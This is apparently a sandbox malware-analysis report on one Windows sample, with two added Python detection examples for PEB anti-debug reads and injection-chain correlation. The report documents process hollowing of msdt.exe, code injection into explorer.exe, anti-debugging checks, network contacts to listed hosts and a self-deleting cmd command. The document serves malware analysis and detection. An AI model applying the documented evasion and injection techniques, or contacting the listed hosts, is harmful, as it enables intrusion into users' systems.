          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe; Code function: 15_2_04ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Code function: 5_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Memory allocated: page read and write | page guard
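The `mov eax, dword ptr fs:[00000030h]` instructions listed above are the 32-bit way of fetching the PEB pointer; whether a given read is an anti-debugging check (BeingDebugged at PEB+0x02, NtGlobalFlag at PEB+0x68) or ordinary loader and heap bookkeeping (Ldr at +0x0C, ProcessHeap at +0x18) is decided by the instruction that consumes the pointer, which is why a raw count of these reads over-approximates. The scanner below is an added example and is not part of the Joe Sandbox report or of the sample: it locates every `mov r32, fs:[30h]` encoding in a byte string and classifies each by the immediately following `[reg+disp8]` access. The byte string is constructed for the example (it is not code from the sample), the PEB offsets are the 32-bit layout, and the DebugPort query reported in the two lines above (NtQueryInformationProcess with ProcessDebugPort) is a separate check this scanner does not cover.

```python
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit PEB fields commonly dereferenced right after the fs:[30h] read.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x10: "ProcessParameters",
              0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}
ANTI_DEBUG_FIELDS = {"BeingDebugged", "NtGlobalFlag"}

# Opcodes that read [reg+disp8]: movzx r32,r/m8; mov r32,r/m32; cmp r/m8,imm8; test r/m8,imm8
FOLLOW_OPCODES = (b"\x0f\xb6", b"\x8b", b"\x80", b"\xf6")


def _match_fs30(code, i):
    """Return (reg_index, length) if code[i:] encodes `mov r32, dword ptr fs:[30h]`, else None."""
    if code[i] != 0x64:                                   # FS segment override prefix
        return None
    if code[i + 1:i + 6] == b"\xa1\x30\x00\x00\x00":      # A1 = mov eax, moffs32 (short form)
        return 0, 6
    modrm = code[i + 2:i + 3]
    if code[i + 1:i + 2] == b"\x8b" and modrm and (modrm[0] & 0xC7) == 0x05 \
            and code[i + 3:i + 7] == b"\x30\x00\x00\x00":  # 8B /r with mod=00 rm=101 -> [disp32]
        return (modrm[0] >> 3) & 7, 7
    return None


def _classify(code, end, reg):
    """Name the PEB field read by the instruction at `end`, or 'unclassified'.
    Only the next instruction is inspected; a production tool would disassemble properly."""
    follow = code[end:end + 4]
    for op in FOLLOW_OPCODES:
        if follow.startswith(op) and len(follow) >= len(op) + 2:
            modrm, disp = follow[len(op)], follow[len(op) + 1]
            if modrm >> 6 == 0b01 and modrm & 7 == reg:   # addressing form [reg + disp8]
                return PEB_FIELDS.get(disp, "PEB+0x%02x" % disp)
    return "unclassified"


def find_peb_reads(code):
    """Linear scan of raw x86-32 code for PEB pointer reads, each tagged with its apparent use."""
    hits, i = [], 0
    while i < len(code):
        m = _match_fs30(code, i)
        if m is None:
            i += 1
            continue
        reg, length = m
        hits.append({"offset": i, "reg": REGS[reg], "field": _classify(code, i + length, reg)})
        i += length
    return hits


def anti_debug_reads(code):
    """Only the reads that feed a debugger check, i.e. what a triage note should list."""
    return [h for h in find_peb_reads(code) if h["field"] in ANTI_DEBUG_FIELDS]


# Constructed code fragment (not bytes from the sample) exercising each pattern.
SAMPLE_CODE = bytes.fromhex(
    "5589e5"            # push ebp; mov ebp, esp
    "64a130000000"      # mov eax, fs:[30h]          (offset 3)
    "0fb64002"          # movzx eax, byte [eax+2]    -> PEB.BeingDebugged
    "85c0"              # test eax, eax
    "90"                # nop
    "648b0d30000000"    # mov ecx, fs:[30h]          (offset 16)
    "8b4168"            # mov eax, [ecx+68h]         -> PEB.NtGlobalFlag
    "a970000000"        # test eax, 70h              (heap flags set under a debugger)
    "648b1530000000"    # mov edx, fs:[30h]          (offset 31)
    "8b420c"            # mov eax, [edx+0Ch]         -> PEB.Ldr (benign loader walk)
    "64a130000000"      # mov eax, fs:[30h]          (offset 41)
    "8b4018"            # mov eax, [eax+18h]         -> PEB.ProcessHeap (benign CRT use)
    "c3"                # ret
)

if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE_CODE):
        print("0x%04x  %s  %s" % (h["offset"], h["reg"], h["field"]))
```

Two of the four reads in the constructed fragment are debugger checks and two are the kind of PEB access every CRT and loader stub performs, so the second list is the one worth quoting in a report. A byte-level scan can also match a 0x64 that sits inside an immediate operand; when the function boundaries are known, as they are in the listing above, running the same classification over a real disassembly removes that noise.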

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe; Network Connect: 81.169.145.161 80
          Source: C:\Windows\explorer.exe; Domain query: www.mambacustomboats.com
          Source: C:\Windows\explorer.exe; Domain query: www.sanlifalan.com
          Source: C:\Windows\explorer.exe; Domain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exe; Network Connect: 104.165.34.6 80
          Source: C:\Windows\explorer.exe; Network Connect: 108.167.135.122 80
          Source: C:\Windows\explorer.exe; Network Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exe; Domain query: www.ribbonofficial.com
          Source: C:\Windows\explorer.exe; Domain query: www.floaterslaser.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 2F0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\msdt.exe; Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Process created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
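The chain the report documents (the sample spawns copies of itself and msdt.exe, unmaps a section in msdt.exe and sets a thread context, writes executable mappings into explorer.exe and queues an APC there, explorer.exe then resolves and connects to the listed hosts on port 80, and msdt.exe finally removes the original file through cmd.exe) is a multi-step sequence that no single API hook can flag with confidence on its own. The correlator below is an added example, not code from the report or from any Joe Sandbox component. It replays a constructed event list that mirrors the lines above; the paths, the 203.0.113.10 endpoint and the domain are stand-ins, and the thread-context target, which the report identifies only as PID 3472, is assigned to msdt.exe in the constructed data for illustration. An alert is raised only when the last precondition of a hollowing, remote-injection, post-injection beaconing or self-deletion pattern is met.

```python
import re
from collections import defaultdict

# Constructed stand-ins for the report's process paths (not the real sample name).
SAMPLE = r"C:\Users\user\Desktop\sample.exe"
MSDT = r"C:\Windows\SysWOW64\msdt.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
SYSTEM_PROCS = {EXPLORER, r"C:\Windows\System32\svchost.exe"}

# Constructed event trace in observed order; each line corresponds to one signature hit above.
EVENTS = [
    {"proc": SAMPLE, "op": "process_create", "target": SAMPLE},
    {"proc": SAMPLE, "op": "process_create", "target": MSDT},
    {"proc": SAMPLE, "op": "section_unmap", "target": MSDT},
    {"proc": SAMPLE, "op": "section_map", "target": MSDT, "prot": "RWX"},
    {"proc": SAMPLE, "op": "thread_set_context", "target": MSDT},
    {"proc": SAMPLE, "op": "section_map", "target": EXPLORER, "prot": "RWX"},
    {"proc": SAMPLE, "op": "apc_queue", "target": EXPLORER},
    {"proc": MSDT, "op": "section_map", "target": EXPLORER, "prot": "RW"},
    {"proc": MSDT, "op": "section_map", "target": EXPLORER, "prot": "RWX"},
    {"proc": MSDT, "op": "thread_set_context", "target": EXPLORER},
    {"proc": EXPLORER, "op": "dns_query", "target": "www.example.invalid"},
    {"proc": EXPLORER, "op": "net_connect", "target": "203.0.113.10:80"},
    {"proc": MSDT, "op": "process_create", "target": CMD,
     "cmdline": r'/c del "C:\Users\user\Desktop\sample.exe"'},
]

# Matches `cmd /c del <path>` with the path bare, double-quoted or single-quoted.
SELF_DELETE = re.compile(r"""/c\s+del\s+["']?(.+?)["']?\s*$""", re.I)


def correlate(events):
    """Replay a process/memory/network trace; return alerts in the order their pattern completed."""
    alerts = []
    children = defaultdict(set)            # parent -> processes it created
    unmapped, exec_mapped = set(), set()   # (actor, target) pairs
    hijacked = []                          # (actor, target) with SetThreadContext or QueueUserAPC
    injected = set()                       # processes that received foreign code
    for ev in events:
        actor, op, target = ev["proc"], ev["op"], ev["target"]
        if op == "process_create":
            children[actor].add(target)
            m = SELF_DELETE.search(ev.get("cmdline", ""))
            if m and m.group(1).lower() == SAMPLE.lower():
                alerts.append(f"self-deletion: {actor} spawned cmd.exe to delete the original sample")
        elif op == "section_unmap":
            unmapped.add((actor, target))
        elif op == "section_map" and "X" in ev["prot"]:
            exec_mapped.add((actor, target))
        elif op in ("thread_set_context", "apc_queue") and (actor, target) not in hijacked:
            hijacked.append((actor, target))
        elif op == "net_connect" and actor in SYSTEM_PROCS and actor in injected:
            alerts.append(f"beaconing: injected system process {actor} connected to {target}")
        # Re-evaluate every control-flow hijack pair after each event so an alert fires
        # exactly once, at the moment its last precondition is satisfied.
        for a, t in hijacked:
            if t in children[a] and (a, t) in unmapped:
                msg = f"process hollowing: {a} -> {t}"    # own child, image unmapped, context set
            elif (a, t) in exec_mapped and t not in children[a]:
                msg = f"remote injection: {a} -> {t}"     # foreign process, executable write + hijack
            else:
                continue
            if msg not in alerts:
                alerts.append(msg)
                injected.add(t)
    return alerts


if __name__ == "__main__":
    for line in correlate(EVENTS):
        print(line)
```

The point of keeping state per (actor, target) pair is that each primitive is benign in isolation: a debugger sets thread contexts in its own child, a JIT maps executable memory, and explorer.exe connects to the network on its own. Only the conjunction (a child whose original image was unmapped before its context was replaced; an executable write into a process the writer did not create followed by an APC; a network connection from a process that is already known to hold foreign code) reaches the confidence the report's own signatures express. In a Sysmon-based pipeline the process creations, process access with write/control rights and network connections map onto event IDs 1, 10 and 3, while the section unmap itself is only visible through a sandbox or kernel trace.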
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp; Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000000.337048787.0000000001128000.00000004.00000020.sdmp; Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Users\user\Desktop\divpCHa0h7.exe VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
